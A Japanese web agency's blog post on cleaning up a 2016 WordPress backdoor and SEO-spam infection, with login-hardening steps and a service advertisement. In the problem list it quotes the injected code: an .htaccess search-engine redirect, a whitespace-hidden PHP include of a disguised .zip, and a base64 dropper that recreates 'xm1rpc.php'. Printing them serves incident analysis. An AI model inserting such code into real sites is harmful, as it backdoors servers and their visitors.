タグ: ウィルス感染

今回の問題（11月2016年）以前（6月2016年）に、マルウエアスが設置されてウィルスに感染したサイト１式を対策後に、サーバにアップしました。セキュリティソフトでウィルスは削除されたが、マルウエアは通常のスクリプトなので目視で削除（1,000ページ超え）。

WordPressのプラグインCrazy Boneでログイン状況をチェック、大量のアタックを発見、アクセス元のIPをプロテクト（all in one wp security）、ログインLock Downを設定、管理画面へのログインURLを変更。

弊社の体験した問題について、海外のサイトでは、
https://www.posizionamento-seo.com/search-engine-optimization/seo-organico/black-hat-seo/wordpress-seo-spam-backdoor/

https://www.scmagazine.com/seo-spam-injects-backdoor-code-on-wordpress-sites/article/571921/

こんな感じで、以下と同じ問題が発生して対処している。これらのウィルス（？）マルウエア（？）は、DDoS攻撃とbruteforce攻撃だそうです。

これを見る限り、日本での検証例はなく、特異な症例だったのかも知れません。

（ 顕在化した問題 ）

1. htaccessに、以下の記述が追加される。
   <IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
   RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
   RewriteRule ^.*$ index.php [L]
   </IfModule>

2. index.php（第一階層にある）に以下の記述が追記される。この改行やスペース間もそのままにしています。
   －－－－－－
   <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   error_reporting(0);ini_set("display_errors", 0);$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));include_once($root_path."/d730d81e7o133a51c2bddc5c68874ce.zip"); ?>
   －－－－
   上記のスペースですが、エディタで開いて、右側で折り返す設定をしないと表示されないためかと思います。（私見）
3. 第一階層に、xm1rpc.php というファイルが生成される。（似たファイル名のxmlrpc.phpというファイルはWordPressに存在している。1とlが違う。）
4. 第一階層に、4bb0a250f62548654e50c3d29c4b6096.zip といったファイルが生成される。ファイル名は、すべて違う。
5. プラグインのphpファイル全てに、以下のような記述が追記されます。
   －－－－－
   <?php $localpath = getenv("SCRIPT_NAME"); $absolutepath = getenv("SCRIPT_FILENAME"); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . '/xm1rpc.php'; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() - filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec('PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC（まだ続きます）
   －－－－－
6. これらを継続して削除しても、しばらくすると生成や追記されている。

（ 仮説 ）

1. 削除しても、上記記述を生成されるので、同じ記述がシステム内に存在しいてるのでは？
2. もしくは、外部サイトにアクセスして、何かデータを取り込んでいるのでは？
3. WordPressシステム内に、何か追記やファイルの追加がされているのでは？
4. FTPやWPログインからアタックされ、ログインされているのでは？

（ 実施 ）

1. WordPressでの発生だったので、wp-adminとwp-includesをまっさらな最新ファイルに置き換え。つまり、問題が想定されるのでファイル全てを削除の後、最新ファイルをアップロード。ポイントは、いったん削除の後、正規のシステムファイルをアップロードする。
2. プラグインを全てftpで削除→新規にインストール。
3. 問題の1.2.の中の記述を、wp-content内でgrepしました。同様に問題3.のファイル名もgrepしてみました。
4. eval( )が何でも外部コマンドを実行するそうなので、wp-content内をgrepしてみた。
   参考にしたのは、
   https://dogmap.jp/2016/05/10/post-3258/
5. wp-admin、wp-includesにも何か書き換えやファイルの追加が発生している事もかんがえられるので、オリジナルとの相違をチェックしました。（新規インストールしてますが安全の為と何か解決の手がかりが見つかるのでは？と考えて）
   使用したツールは、

   WinMerge
   http://www.geocities.co.jp/SiliconValley-SanJose/8165/winmerge.html
   こらです。フォルダ全体でチェックが可能でした。

6. xm1rpc.phpファイルのパーミッションを000にする事で、これ以上ファイルが生成されないのでは？
7. ログイン関係一式を新しく、しかも定期的にパスワード変更→チームで共有。

（ 検証 ）

1. 上記実施3.4.は、見つからず。
2. 実施5.は、以下のファイルの追加と書き換えがありました。
   ファイル追加：wp-includes/index.php
   ファイル書き換え：wp-includes/load.php
   対応）追加されたファイルは削除、書き換えられたファイルは、オリジナルに書き換え。これらファイル内に、<IfModule（htaccessに記載される内容）　と　xm1rpc（生成される不明なファイル）　の記述がありました。
3. 5.をさらに、themeにもおこないました。
   header.php
   が書き換えられていました。しかも、このファイルにはトロイの木馬ウィルス反応がありました。（PCで使用しているセキュリティソフトで）
   対応）オリジナルに書き換え。
4. 実施6.は、パーミッションが、しばらくすると戻ってしまいました。

（ さらに仮説 ）

1. FTPやWordPressログインから、ファイルの書き換えが実施されているのでは？
2. 我々の未発見の問題ファイルがあり、何かのアクション（アクセスなど）でサーバ内にファイルの追加やファイル書き換えが実施されているのでは？
3. WordPressログインは、キャッシュが残っている場合、IDとPasswordが不要でログインできてしまうので、この部分の対応も重要では？（これは、Crazy Boneでの不正と思われるアクセスログが現象しているのに問題が継続したので）
4. uploadされている画像にもウィルスが記述されるている可能性がある。
   参考にしたサイト（他もあります）
   http://securityblog.sonydna.com/blog/security-measure/archives6/

（ さらに実施 ）

1. FTPやWordPressログインパスワードの再設定、高度化。実際のユーザーさんには、管理方法の提案やウィルスソフトの使用とマシンスキャンなどの提案。
   こういった内容を提案しました。
2. WordPres管理画面から、プラグインを含むファイルの追加や書き換えをできない設定にした。
   wp-config.php
   /** ファイル編集できなくする */
   define('DISALLOW_FILE_EDIT', true);
   define('DISALLOW_FILE_MODS', true );
   上記を追記。
3. header.phpとfooter.phpのパーミッションを400に変更。
4. アップロードされた画像ファイル（膨大にありました1万ファイルくらいはあったかな）の撮影情報の記述を消滅させる事で安全化できるらしいので、実行しました。
   撮影情報の削除には、ファイル型式の変更でいけるようでしたので、jpg→png(32bit)に変換して、これをさらにjpgにもどす。pngは一端jpg（高解像度）にして、そのjpg→pngに、gifも同様の作業。
   ※）このpngを32bitにしているのは、jpgの持つ写真のグラデーションを失わないため。
5. 追加対応）wp-adminにbasic認証。
6. ログインにLockDown以外にCaptchaを設定。

これで現状は、48時間（この文章を書いている時点）、怪しいファイルの生成や書き換えは発生していない。（追記：既に10日ほど問題なし）

しかし、こう書いてみると短く簡単に思われるかと思いますが、仮説→検証は、10回くらいしたような、つまり仮説→検証で、結果がでない、イコール仮説がだめ。この繰り返し。

そもそも上記の生成されるspamファイル名や内部の記述でネット検索しても、まず情報はなく、ここに至るまで、相当の時間がかかりました。（つまり、新しい事例なのか？）

「さらに仮説の3.」は、未実施。

（ 現時点でざっくりとした感触 ）

管理画面からのファイルとpluginの書き換えを禁止したら、敵さんからのアクションが停止しました。もしかしたら、Pluginを含む管理画面から編集可能なファイルにバックドアをしかける。その上で、wp-adminやwp-includesにファイルを追加したり追記して増殖を図り、そこから、外部のサイトへのアタックだったのでしょうか？（あくまで推察）

やはり、ログインIDとパスワードの管理ですね。簡単なパスワードを使い回したりするのはよくないです。仮に、定期的に変更していても、過去に使用していたパスワードですと、簡単にログインされてしまうのではとも感じました。

spamアタックでトライするログインIDが過去に設定していたIDになるケースが多かったので、どこかネットの闇市場で、IDと想定されるパスワードが出回ったのかもしれません。

BlackList設定して特定のIPからの管理画面へのアクセスを遮断すると、敵さんは、IPアドレスを毎回変更してきました。そこで、*（アスタリスク）にして、IPアドレスのレンジを広げることにしました。

つまり、192.168.100.100 （これは仮のIPで、イントラのIPですが）を、192.168.100.*  にすると、末尾のブロックの1から255までのレンジでプロテクトができます。

自分は、大丈夫、つまり、自分のPCやMacはウィルスに感染していないという過信がよくないようにも感じました。弊社のお客さんで、マシンが不調になったので、マイクロソフトにリモートでチェックをお願いしましたところ140を超えるウィルスが検出されたそうです。

その会社さん、セキュリティソフトは入れていた様ですが、こういった結果になってしまいました。

（ セキュリティソフトに関する考え方 ）

そもそも、ウィルスは、日々世界中で、開発されていて日々世界に流れ出しています。これを、セキュリティソフトの会社さんは、発見→解析→対策→配布、を継続して行っている訳です。

これは、高額なセキュリティソフトも、フリーのソフトも同じです。こう言うと、必ず言われるのが「だったら、フリーので充分じゃない」。でも、何が違うのかというとスピードなのです。

タイムラインで考えてみてください。新種のウィルスが発生した。即、その日のうちに対応（対応パッチを適応）した、というセキュリティソフトの会社と、一ヶ月後に対策対応したセキュリティ会社さん。当然、前者のスタイルでないと困ります。対策されるまでに、大量ウィルスが飛散され問題が顕在化する恐れがありますし、またウィルスによって、サイトの攻撃とかも想定されます。

なので、前者が有料で優秀なセキュリティソフトで、後者はフリーのセキュリティソフトだったりします。そこに価格の差があるのですが、両者とも、ウィルス検出率としては、90%（数字は自信がありません）とか公表したりします。ただ、これは一か月後の検出力なのです。

ウィルスやマルウエア発生、直後の検出率ではないのです。

つまり、ウィルスやマルウエアが流布した、即、対応してプロテクトされる、これが理想です。一か月後にプロテクトできても拡散している可能性が高い、ということなのです。

これらのトラブル経験からサイトの管理運営を最適化したサービス「DtAサポート」を始めました。
　DtAサポート　

検索サイトからの評価が高まり、サイトへのアクセスが拡大してくると、多くのケースで管理画面への不正なアクセス（アタック）も拡大する。特に、お使いのCMSがWordPressの場合、特に多くの不正アクセスが発生する。

これは、インターネットで使用されているCMSの多く（50％超え）がWordPressである事にも起因している。つまり、ハッキングする不正アクセスする側からすれば、WordPress攻略方法を確立すれば効率がよいという事になる。

左の画像（画像をクリックすると拡大表示されます）は、管理画面への不正アクセスリストの一部である。

ご覧いただいておわかりの様にadminというユーザー名でのアクセスが多い。これは、wordPressインストール時に何もしなければadminというユーザー名で管理者アカウントが生成されるからである。

では、具体的にどのように、こういった不正アクセスのログ（記録）を取得するのか？

弊社では、Crazy Boneというプラグインを活用している。これは、管理画面へのアクセスログを取得する。（※現在ではCrazy Boneは使用していない。理由：アプリのアップデートが2年ほどされていない）

使い方は、至ってシンプルで、管理画面左メニューの「ユーザー」→「ログイン履歴」で表示される。そして、プルダウンメニューで、「全て」と「login_error」チョイスして「フィルターを適用」をクリックすると、上記のリストが表示される。

表示されない場合は、不正アクセスがなかったという事で､一安心である。ただ、プラグインを設定してすぐの場合、ログが取得できていないのである程度の期間の後、及び継続的にログを確認するのが望ましい。

all in one wp securityというプラグインの場合、ログインエラーの状況だけではなく、さらにログインしたユーザーも確認できるので、実際に不正アクセスが実行されてしまった事も確認できる。

こういった不正アクセス対策として、
何を実行すべきなのかをリストにしてみた。

1. 管理画面に不正アクセスをさせない。
   → ログインURLのカスタマイズ。※以下に設定のフローを記載。
2. 不正アクセスがあっても簡単にログインをさせない。
   → Login Lock Downと呼んでいる「一定回数ログインに失敗した場合、アクセス元のIPアドレスを一定時間プロテクトする」機能を設定にする。※以下に設定のフローを記載。
3. 不正アクセスがあるが、まだ、スパマーはログインできていない。
   → そのアクセス元IPアドレスをブラックリストとして登録して、指定IPからのアクセスを遮断する。*（アスタリスク）を使用して、一定の範囲のIPアドレスをブロックする事も可能。※以下に設定のフローを記載。
4. スパムアクセスのユーザー名にadminが多い。
   → ユーザー名 admin を使用しない。もし、初期設定してしまった場合、難易度の高いパスワードを設定する。
5. ログインIDを知られないためにも、ユーザーのニックネームを設定する。初期状態では、IDがそのままユーザー名として使用されるので注意が必要です。つまり、サイトにログインIDを公開している状態なのです。（ただしくは、この方法でもURLからログインIDは判明してしまいますので、管理権限の低いユーザーでの投稿に変更します）
6. ログイン画面に、ユーザー名とハワード以外にも、簡単な計算（計算して正しい数字をいれないとログインできない）を設置することも有効のようです。ログインキャプチャと呼ばれています。
7. パスワード再設定、つまり「パスワードをお忘れですか」のリンク先にも上記と同じ方法のキャプチャを設置すると有効のようです。つまり、メールアカウント自体がハッキングされている事を想定する必要もあります。

これらの設定が重要です。最も簡単なのは、All In One WP Securityというプラグインを活用する（弊社も活用しています）。

上記１.の場合、管理画面の左メニュー「WP Security」から「Brute Force」を選択、初期表示される「Rename Login Page」の「Enable Rename Login Page Feature」にチェックをいれて、その下の「Login Page URL」で、管理画面へのアクセスURLをカスタマイズする。

つまり、通常（多くのケース）、管理画面へのアクセスは、
https://dt-a.net/wp/wp-login.php
ですが、これを例として、以下のようにカスタマイズ（例として）
https://dt-a.net/example-login
することで多くの不正アクセスを排除する事ができる。

※一部のサーバでSSLを使用している場合、うまくいかないケースもあります。この場合は、FTPアクセスしてWP Securityのパーミッションを一端0000にしてからリトライです。

上記2.のLogin Lock Downは、左の管理メニュー「WP Security」の「User Login」の初期表示される「Login Lockdown」の「Enable Login Lockdown Feature」にチェックを入れて、その下に見える「３」「５」「60」の数字（初期状態の数字でも問題はない）は、5分間に3回ログインに失敗した場合、60分間、アクセス元のIPをプロテクトする、という意味です。

上記3.のブラックリスト登録は、まず不正アクセスしてくるIPアドレスを取得する事から始まる。もし、こういったIPアドレスのリストが必要な場合、ご相談いただければお渡しできますが、敵（スパムアクセス元）もIPアドレスは、いろいろと変更してくるので効果が薄いかも知れません。（例として一般のプロバイダを利用していれば、毎回アクセス毎にIPアドレスは変わるのです。これを活用されるとかなりIPアドレスのリストが必要になります）

その上で、左の管理メニュー「WP Security」の「Blacklist Manager」から「Enable IP or User Agent Blacklisting」にチェックをいれて、その下の「Enter IP Addresses」にIPアドレスのリストをいれます。もしくは、さらに下にある「Enter User Agents」にユーザーエージェント」いれる事で、不正アクセスもとのシステムをプロテクトする事も可能なようです（実際には試していません）。

上記以外にも、顧客向けに対策したのは、

• コメント無効化。
• Pingback機能の無効化。
• DBのPrefixのカスタマイズ（初期状態ではwp_になっている）。
• htmlソース内のwordpressバージョンを非表示にする。

といった対応をしました。

そもそも、不正アクセスされて、どんな問題がおきるのか？ですが、ここ数年、弊社顧客の例ですと、以下ような問題がありました。

• ウィルスを拡散する土台にされた。つまり、そのwebページにアクセスすると、何らかのウィルス感染するようにしかけられた。（当時、弊社にノウハウがなく専門業者にお願いして対応しました。結構なコストが発生しました。）
• 上記とDoDos攻撃などの土台にされる可能性もある。
• 怪しい外部リンク、例えば、webカジノや怪しい薬剤販売のwebサイトへのリンクが設置された。（3,000カ所を超る外部リンクを設置されました。ほとんどの部分手作業で取り除く事になった。トホホホ。）

これらのトラブル経験から
サイトの管理運営を最適化したサービス
「DtAサポート」を始めました。

　DtAサポート